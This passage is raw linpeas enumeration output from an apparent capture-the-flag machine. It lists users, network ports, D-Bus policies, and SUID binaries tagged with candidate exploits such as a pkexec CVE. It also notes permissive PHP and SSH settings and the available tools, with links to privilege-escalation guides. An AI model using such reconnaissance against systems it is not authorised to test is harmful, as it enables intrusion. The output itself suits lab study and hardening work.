└─(Read Write)
/var/run/dbus/system_bus_socket
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf ( <policy user="avahi">)
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf ( <policy group="netdev">)
Possible weak user policy found on /etc/dbus-1/system.d/bluetooth.conf ( <policy group="bluetooth">
<policy group="lp">)
Possible weak user policy found on /etc/dbus-1/system.d/wpa_supplicant.conf ( <policy group="netdev">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 266 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
:1.111 6260 busctl 296640a3b825115a :1.111 session-46.scope 46 -
:1.17 531 cupsd root :1.17 cups.service - -
:1.18 532 cups-browsed root :1.18 cups-browsed.service - -
:1.19 532 cups-browsed root :1.19 cups-browsed.service - -
:1.2 343 wpa_supplicant root :1.2 wpa_supplicant.service - -
:1.4 1 systemd root :1.4 init.scope - -
:1.5 355 avahi-daemon avahi :1.5 avahi-daemon.service - -
:1.6 346 systemd-logind root :1.6 systemd-logind.service - -
:1.96 1009 systemd 296640a3b825115a :1.96 user@1000.service - -
com.hp.hplip - - - (activatable) - -
fi.epitest.hostap.WPASupplicant 343 wpa_supplicant root :1.2 wpa_supplicant.service - -
fi.w1.wpa_supplicant1 343 wpa_supplicant root :1.2 wpa_supplicant.service - -
org.bluez - - - (activatable) - -
org.freedesktop.Avahi 355 avahi-daemon avahi :1.5 avahi-daemon.service - -
org.freedesktop.ColorManager - - - (activatable) - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.PolicyKit1 - - - (activatable) - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 346 systemd-logind root :1.6 systemd-logind.service - -
org.freedesktop.network1 - - - (activatable) - -
org.freedesktop.resolve1 - - - (activatable) - -
org.freedesktop.systemd1 1 systemd root :1.4 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - -
org.freedesktop.timesync1 266 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
60832e9f188106ec5bcc4eb7709ce592
127.0.0.1 localhost
127.0.1.1 decoy
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 192.168.1.1
dnsdomainname Not Found
╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.158 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::a00:27ff:fe3c:d465 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:3c:d4:65 txqueuelen 1000 (Ethernet)
RX packets 562827 bytes 75929221 (72.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 430585 bytes 181509010 (173.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 138 bytes 13640 (13.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 138 bytes 13640 (13.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
╔══════════╣ Do I have PGP keys?
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(avahi-autoipd) gid=113(avahi-autoipd) groups=113(avahi-autoipd)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(avahi) gid=117(avahi) groups=117(avahi)
uid=108(saned) gid=118(saned) groups=118(saned),116(scanner)
uid=109(colord) gid=119(colord) groups=119(colord)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(hplip) gid=7(lp) groups=7(lp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=9(news) gid=9(news) groups=9(news)
╔══════════╣ Login now
04:37:41 up 45 min, 1 user, load average: 0.15, 0.06, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
296640a3 pts/0 192.168.56.137 04:33 13.00s 0.04s 0.00s w
╔══════════╣ Last logons
root pts/2 Sat Jun 27 18:13:40 2020 - Sat Jun 27 18:13:41 2020 (00:00) 192.168.1.162
root pts/0 Sat Jun 27 17:41:12 2020 - Sat Jun 27 19:00:13 2020 (01:19) 192.168.1.162
reboot system boot Sat Jun 27 17:40:50 2020 - Sat Jun 27 19:00:13 2020 (01:19) 0.0.0.0
root pts/0 Sat Jun 27 17:39:24 2020 - Sat Jun 27 17:40:32 2020 (00:01) 192.168.1.162
root pts/0 Sat Jun 27 17:39:21 2020 - Sat Jun 27 17:39:22 2020 (00:00) 192.168.1.162
root pts/0 Sat Jun 27 17:38:30 2020 - Sat Jun 27 17:39:19 2020 (00:00) 192.168.1.162
root tty1 Sat Jun 27 17:37:12 2020 - down (00:03) 0.0.0.0
reboot system boot Sat Jun 27 17:35:46 2020 - Sat Jun 27 17:40:33 2020 (00:04) 0.0.0.0
wtmp begins Sat Jun 27 17:35:46 2020
╔══════════╣ Last time logon each user
Username Port From Latest
root pts/0 192.168.1.162 Tue Jul 7 17:00:26 -0400 2020
296640a3b825115a47b68fc44501c828 pts/0 192.168.56.137 Mon Nov 7 04:33:30 -0500 2022
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/sudo
/usr/bin/wget
/usr/bin/xterm
╔══════════╣ Installed Compilers
ii g++ 4:8.3.0-1 amd64 GNU C++ compiler
ii g++-8 8.3.0-6 amd64 GNU C++ compiler
ii gcc 4:8.3.0-1 amd64 GNU C compiler
ii gcc-8 8.3.0-6 amd64 GNU C compiler
/usr/bin/gcc
╔══════════╣ Searching mysql credentials and exec
Found readable /etc/mysql/my.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 869 Jan 29 2020 /etc/mysql/mariadb.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.38 (Debian)
Server built: 2019-10-15T19:53:42
httpd Not Found
Nginx version: nginx Not Found
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.3.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.3.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.3.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.3.conf: SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jun 27 2020 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Jun 27 2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Jun 27 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Apr 2 2019 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jun 27 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 72293 Jun 27 2020 /etc/php/7.3/apache2/php.ini
allow_url_fopen = On
allow_url_include = On
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71905 Jun 27 2020 /etc/php/7.3/cli/php.ini
allow_url_fopen = On
allow_url_include = On
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun 27 2020 /etc/ldap
╔══════════╣ Searching ssl/ssh files
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 27 2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jan 31 2020 /etc/pam.d/sshd
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 27 2020 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 8132 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 5106 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5115 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2763 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 7443 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 8132 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 5106 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5115 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2763 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 48747 Apr 23 2019 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 23889 Apr 23 2019 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 7443 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-stable.gpg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Mar 1 2019 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Feb 16 2020 /etc/php/7.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Feb 16 2020 /usr/share/php7.3-common/common/ftp.ini
╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 22 Jun 27 2020 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 Jun 27 2020 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 Jun 27 2020 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 Apr 18 2019 /etc/skel/.bashrc
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 /home/296640a3b825115a47b68fc44501c828/.bashrc
-rw-r--r-- 1 root root 807 Apr 18 2019 /etc/skel/.profile
-rwxr-xr-x 1 root root 807 Jun 27 2020 /home/296640a3b825115a47b68fc44501c828/.profile
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 23K Jan 15 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 154K Feb 2 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 19K Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 10K Feb 18 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Parent Shell capabilities:
0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 Feb 10 2019 usr.bin.man
-rw-r--r-- 1 root root 540 Apr 10 2019 usr.sbin.cups-browsed
-rw-r--r-- 1 root root 5552 Apr 25 2020 usr.sbin.cupsd
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2020-07-07+17:06:17.4942903680 /home/296640a3b825115a47b68fc44501c828/user.txt
2020-07-07+16:19:42.2450607880 /home/296640a3b825115a47b68fc44501c828/honeypot.decoy
2020-06-27+17:40:13.6903845330 /home/296640a3b825115a47b68fc44501c828/.profile
╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img
/initrd.img.old
/vmlinuz.old
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 12
drwxr-xr-x 2 root root 4096 Jun 27 2020 .
drwxr-xr-x 89 root root 4096 Jul 7 2020 ..
-rw-r--r-- 1 root root 664 Mar 1 2019 bash_completion.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/296640a3b825115a47b68fc44501c828/honeypot.decoy
/home/296640a3b825115a47b68fc44501c828/honeypot.decoy.cpp
/home/296640a3b825115a47b68fc44501c828/SV-502/logs
/home/296640a3b825115a47b68fc44501c828/SV-502/logs/log.txt
/home/296640a3b825115a47b68fc44501c828/ifconfig
/home/296640a3b825115a47b68fc44501c828/mkdir
/home/296640a3b825115a47b68fc44501c828/id
/home/296640a3b825115a47b68fc44501c828/.profile
/home/296640a3b825115a47b68fc44501c828/ls
/home/296640a3b825115a47b68fc44501c828/.bash_history
/root/
/var/www
/var/www/html
/var/www/html/save.zip
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/296640a3b825115a47b68fc44501c828
/home/296640a3b825115a47b68fc44501c828/SV-502
/sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service
/sys/fs/cgroup/unified/user.slice/user-1000.slice/user@1000.service
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/daemon.log
/var/log/lastlog
/var/log/wtmp
/var/log/auth.log
/var/log/syslog
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/296640a3b825115a47b68fc44501c828 (limit 20)
total 64
drwxr-xr-x 4 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jul 7 2020 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp
lrwxrwxrwx 1 root root 7 Jun 27 2020 id -> /bin/id
lrwxrwxrwx 1 root root 13 Jun 27 2020 ifconfig -> /bin/ifconfig
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jun 27 2020 .local
lrwxrwxrwx 1 root root 7 Jun 27 2020 ls -> /bin/ls
lrwxrwxrwx 1 root root 10 Jun 27 2020 mkdir -> /bin/mkdir
-rwxr-xr-x 1 root root 807 Jun 27 2020 .profile
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27 2020 .selected_editor
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jun 27 2020 SV-502
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 33 Jul 7 2020 user.txt
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 173 Jun 27 2020 .wget-hsts
╔══════════╣ Files inside others home (limit 20)
/var/www/html/save.zip
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 363752 Apr 30 2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 194817 Nov 23 2016 /usr/share/doc/x11-common/changelog.Debian.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 9716 Apr 27 2020 /usr/lib/modules/4.19.0-8-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9716 Jun 7 2020 /usr/lib/modules/4.19.0-9-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Jun 27 2020 .
drwxr-xr-x 12 root root 4.0K Jun 27 2020 ..
drwxr-xr-x 2 root root 4.0K Jul 7 2020 html
/var/www/html:
total 12K
drwxr-xr-x 2 root root 4.0K Jul 7 2020 .
drwxr-xr-x 3 root root 4.0K Jun 27 2020 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27 2020 /home/296640a3b825115a47b68fc44501c828/.selected_editor
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 173 Jun 27 2020 /home/296640a3b825115a47b68fc44501c828/.wget-hsts
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 /home/296640a3b825115a47b68fc44501c828/.bash_logout
-rw------- 1 root root 0 Jun 27 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 18 2019 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 Nov 7 03:52 /run/network/.ifstate.lock
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxr-xr-x 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 827827 Nov 7 04:36 /tmp/linpeas.sh
-rw-r--r-- 1 root root 152413 Jun 27 2020 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 24405 Jun 27 2020 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 230 Jun 27 2020 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 578191 Jul 7 2020 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 186 Jun 27 2020 /var/backups/dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.2.gz
-rw-r--r-- 1 root root 40960 Jun 27 2020 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 147845 Jun 27 2020 /var/backups/dpkg.status.2.gz
-rw-r--r-- 1 root root 186 Jun 27 2020 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 186 Jun 27 2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.1.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
